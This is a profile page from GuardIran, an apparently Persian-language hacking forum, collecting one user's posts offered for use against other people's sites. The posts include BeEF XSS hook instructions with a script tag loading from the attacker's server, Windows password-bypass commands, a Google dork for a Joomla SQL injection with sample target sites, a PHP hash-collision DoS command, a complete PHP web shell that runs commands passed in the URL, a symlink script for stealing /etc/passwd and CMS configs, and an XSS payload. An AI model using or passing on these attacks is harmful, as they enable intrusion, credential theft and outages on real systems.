رفتن به مطلب
بازگشایی انجمن! ×
GuardIran

html4_4

کاربر رسمی
  • ارسال ها

    33
  • تاریخ عضویت

  • آخرین بازدید

2 دنبال کننده

درباره html4_4

  • تاریخ تولد 08/30/2015

آخرین بازدید کنندگان پروفایل

1,032 بازدید پروفایل

دستاوردهای html4_4

  1. html4_4

    Beef Xss

    سلام اصلا نیازی به اپلود نیست خوب دقت کنید beef رو که اجرا میکنی روی کالی یه پنل تحت وب بشما میده و یه آدرس اسکریپت پنل ور بهش لاگین میکنی ادرس اسکریپت رو هم به این شکل عوض کن [Hidden Content] برای پیدا کردن ای پی تونم فقط کافیه my ip رو تو گوگل سرچ کنی حالا این کد رو جای که این اسیب پذیری هست قرار میدی <script src="[Hidden Content]" type="text/javascript"></script> و وارد پنل beef میشی و منتظر میمونی
  2. html4_4

    Beef Xss

    خودت تغییرباید بدی مثلا [Hidden Content] بعد پورت رو فوروارد میکنی به ip local کالی
  3. html4_4

    Beef Xss

    سلام اگر از کالی استفاده میکنی نیازی به نصب نداره و نیازی نیست که حتما روی یه سرور اجرا بشه
  4. استفاده از ابزارهای خود ویندوز خود ویندوز هم یک سری ابزار را در اختیار ما گذاشته که حتی بدون دانستن پسورد قبلی پسورد های جدید برای حساب های کاربری انتخاب کنیم این ابزارها در محیط های Administrator و Power User و یا حسابی که این اجازه به آن داده شده قابل استفاده است مثلا حساب های کاربری که هنگام نصب ویندوز ساخته میشوند این اجازه رو دارند خوب بریم سراغ آموزش : User Accounts Control Userpassword2 Win Key + R --> control userpasswords2 --> enter وارد Run بشید و کلمه control userpasswords2 رو وارد کنید و اینتر بزنید پنجره زیر باز میشه حساب کاربری مورد نظر خودتونو انتخاب کنید و دکمه Rest Password رو انتخاب کنید در کادر خواسته شده پسورد جدید رو وارد کنید نیازی به پسورد قبلی نیست
  5. بخش دوم تا حالا شده به این فکر کنید که سیستم چه طوری متوجه میشه که ما username و password رو درست وارد کردیم؟ این به این معنی که که حساب های کاربری و پسوردها سیستم داخل یک فایل یا database ذخیره میشه این فرایند با استفاده از LSA (Local Security Authority ) انجام میشه هر بار که کاربر قصد ورود به سیستم رو داره پسورد ورودی توسط LSA به پایگاه داده ای به اسم SAM که کلیه پسورد ها را در خود دارد فرستاده میشه و مقایسه انجام میشه . بریم سراغ اولین آموزش : ورود به حساب کاربری Administrator اولین روش در عبور از پسورد در ویندوز XP : قبل از ورود به ویندوز در Welcom Screen کلید های : Ctrl + Alt + Duble Delete رو بزنید پنجره زیر باز میشه: نام کاربری رو Administrator و کادر پسورد رو خالی بزارید و Enter اگر صفحه Welcom Screen ظاهر نشده ویندوز رو در حالت Safe Mode بالا بیارید نکته : این روش در ویندوز 7 و ویستا عملی نیست چونکه پیش فرض حساب کاربری Administrator غیرفعل هستش برای فعال کردن از این دستور استفاده کنید : Net user Administrator password /active:yes روش مقابله : گذاشتن پسورد روی حساب کاربری Administrator موقع نصب ویندوز پسورد Administrator رو خالی نزارید
  6. حساب های کاربری و کلمات عبور ما از حساب های کاربری و کلمات عبور برای شناساندن کاربران به سیستم عامل و برای جلوگیری از ورود افراد ناشناس به حساب کاربری استفاده میکنیم در فرایند احراز هویت دو معیار کلی یعنی حساب کاربری و کلمه عبور(در صورت وجود) از کاربر درخواست میشود نکته امنیتی : از اسامی admin و Administrator و modir در نامهای کاربری استفاده نکنید نکته امنیتی : نام کاربری طوری تعیین شود که نمایشگر اطلاعت شخصی کاربر مثل (نام و نام خانوادگی) نباشد گروهای کاربری گروه های کاربری به دودسته تقسیم میشوند : گروه های موجود در یک سیستم محلی(Local) که به سه گروه تقسیم می شوند : 1. گروه مدیران سیستم 2. گروه کاربران محدود شده 3. گروه کاربران مهمان فرق این سه گروه رو میتونید در جدول زیر مشاهده کنید : این گروه هم خود داری انواع مختلف هست که طبق نیاز کاربر باید هر کاربری را عضو یکی از گروه ها کنیم در اینجا به چند مورد اشاره میکینم گروه های موجود در یک شبکه اعضای این گروه هنگامی کاربرد دارند که ما عضوی یک دامنه کاری یا یک شبکه باشیم هنگام ایجاد محدودیت ها و دادن مجوزها بر روی منابع به اشتراک گذاشته شده در شبکه این گروه ارزش زیادی دارند دراینجا به ذکر چند مورد می پردازیم: نکته امنیتی :همیشه مراقب تعداد حساب های کاربری و حسابهای کاربری بلااستفاده ای که در شبکه موجود است باشید نکته امنیتی : ایجاد یک کاربر قلابی با نام Administrator نکته امنیتی : جایگزین کردن گروه Everyone با گروه Authenticated Users بر روی پوشه های به اشتراک گذاشته شده
  7. سلام با اموزش های هک و امنیت در سیستم عامل ویندوز فقط در دسترسی های فیزیکی در خدمتتون هستم من از مقاله اقای مسلم حقیقیان استفاده میکنم و تجربیات خودم رو هم بهش اضافه میکنم آموزش رو از پایه شروع میکنیم امیدوارم مفید واقع بشه اگر سوال یا مطلبی بود به صورت پ.خ مطرح کنید
  8. تو که میخواستی اینارو نصب کنی برای چی کالی نصب کردی؟ بهترین کار برای شما نصب کالی روی virtualbox یا vmware هستش
  9. html4_4

    اکسپلویت جوملا com_youtubegallery

    سلام خدمت دوستان گرامی Joomla com_youtubegallery Sql injection دورک : inurl:option?=com_youtubegallery themeid= نمونه سایت ها با این آسیب پذیری : [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content]
  10. html4_4

    اکسپلویت PHP Hash Collision

    سلام اگه میشه در باره این اکسبلویت بیشتر توضیح بدید برای چی هست روش نفوذ ============================ Denial of service همون اتک DOS هستش و ما تو این روش به کمک اکسپلویت کاری میکنیم که دسترسی به یک منبع روی سرور که میتونه Ram یا CPU باشه رو مختل کنیم این روش روی سرور های که منابع رو شیر میکنن و اجازه نمیدن که کاربر بیشتر از یه حدی از منابع استفاده کنه بهتر جواب میده مثل Cloudlinux که البته روش های برای جلوگیر وجود داره مثل همین سایت که تو صفحه اول میتونیم ببینیم و اما روش نفوذ : خیلی از دوستان و بزرگان هک این روش رو یکی از روش های هک نمیدونن چون اصلا نفوذی انجام نمیشه اما چیزی که خود من به این نتیجه رسیدم اینه که بستگی داره هدف شما چی باشه مثلا اگر هدف شما دسترسی به اطلاعات باشه این روش به کارشما نمیاد و اگر هدف شما صدمه زدن به یک سرور یا یک سایت باشه فرض کنید یک سایت فروشگاهی یک روز کامل بالا نیاد اگر اشتباه گفتم دوستان اصلاح کنن
  11. html4_4

    اکسپلویت PHP Hash Collision

    نوع حمله : Denial of service ورژن اسیب پذیر : Affected PHP versions (up to 5.3.8). نحوی استفاده : این ابزار به زبان Python نوشته شده و برای اجرا ورژن requires Python 2.7 نیاز است شکل کلی دستور : python HashtablePOC.py -u [Hidden Content] -v -c 1 -w -o output -t PHP نمونه سایت با این اسیب پذیری HashtablePOC.rar
  12. سلام کد رو تو یه فایل php ذخیره کنید مثلا test.php نحوی استفاده میشه [Hidden Content] <?php error_reporting(E_ALL); if(isset($_GET['cmd']) and !empty($_GET['cmd'])) { $hadi_ws_kiamarsi= new COM('wscript.shell') or die('Unable TO Load Activex'); $hadi_stdout_kiamarsi=$hadi_ws_kiamarsi->exec($_GET['cmd']); echo '<pre>'; echo $hadi_stdout_kiamarsi->stdout->readall; echo '<pre>'; } ?> تشکر یادتو نره :D
  13. html4_4

    Script Symlink Perl

    سلام خوب مرحله اول شما اسکریپت پرل رو اپلود و پرم 0755 بهش بدید پیشنهاد میکنم که برای خودتون اول یه پوشه درست کنید مرحله دوم فایل htaccess رو دقیقا همونجایی که اسکریپت رو اپلود کردید اپلود کنید بعد اسکریپت رو تو url باز کنید حالا ما نیاز به Passwd داریم که با دستور cat /etc/passwd اون رو میخونیم و تو اسکریپت کپی میکنیم این اسکریپت کانفیگ cms های joomla - wordpress -whm و phpbb رو میگیره تشکر یادتون نره Symlink Priv8.rar
  14. html4_4

    اکسپلویت JCE Joomla Extension Remote File Upload

    این اکسپلویت با php نوشته شده و کافیه فیلدهای خواسته شده رو پر کنید :ph34r: jce.rar
  15. html4_4

    باگ XSS بدون هیچ پارامتری

    سلام خدمت همه دوستان باگ XSS رو همه میشناسن دیگه توضیح نمیدم اموزشهاش تو انجمن هست امروز میخوام اموزش این باگ در url رو بدم ما تو این روش هیچ پارامتر ورودی رو نداریم مثلا id یا newstitle و ... linke Exploit : [Hidden Content] Target : [Hidden Content] این خط رو به ادرس اضافه کنید r3nw4"</title>'>><BoDy!><BODY onpageshow=prompt(/XSSPOSED/)></ ادرس میشه : [Hidden Content]//r3nw4%22%3C/title%3E%27%3E%3E%3CBoDy!%3E%3CBODY%20onpageshow=prompt%28/XSSPOSED/%29%3E%3C/ میبینید که script اجرا میشه :D
×
×
  • ایجاد مورد جدید...